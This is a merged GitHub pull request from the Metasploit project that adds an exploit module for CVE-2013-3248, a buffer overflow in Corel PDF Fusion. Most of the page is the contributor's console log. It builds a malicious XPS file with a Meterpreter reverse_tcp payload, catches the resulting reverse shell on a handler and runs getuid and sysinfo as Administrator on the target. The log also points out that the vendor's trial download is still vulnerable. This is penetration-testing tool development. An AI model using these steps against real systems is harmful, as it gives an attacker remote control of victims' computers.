Add module for CVE-2013-3248 #2101

Merged
merged 1 commit into from Jul 11, 2013

jvazquez-r7
Contributor

Tested successfully with Corel PDF Fusion 1.11 / Windows XP SP3.

Tested with the trial downloaded from: http://www.corel.com/corel/product/index.jsp?pid=prod4100140&cid=catalog20038&segid=1105&storeKey=us&languageCode=en

At the time of writing, the available trial is still the vulnerable version. If something changes, don't hesitate to ask me for a vulnerable version installer.

Test results:

msf > use exploit/windows/fileformat/corelpdf_fusion_bof 
msf exploit(corelpdf_fusion_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(corelpdf_fusion_bof) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(corelpdf_fusion_bof) > exploit

[*] Creating 'msf.xps' file...
[+] msf.xps stored at /Users/juan/.msf4/local/msf.xps
msf exploit(corelpdf_fusion_bof) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1511) at 2013-07-11 12:29:08 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 1 closed.  Reason: User exit

@wchen-r7
Contributor

Works for me, merging.

wchen-r7 added a commit that referenced this pull request Jul 11, 2013
wchen-r7 merged commit d9107d2 into rapid7:master Jul 11, 2013
jvazquez-r7 deleted the corelpdf_fusion_bof branch November 18, 2014 15:45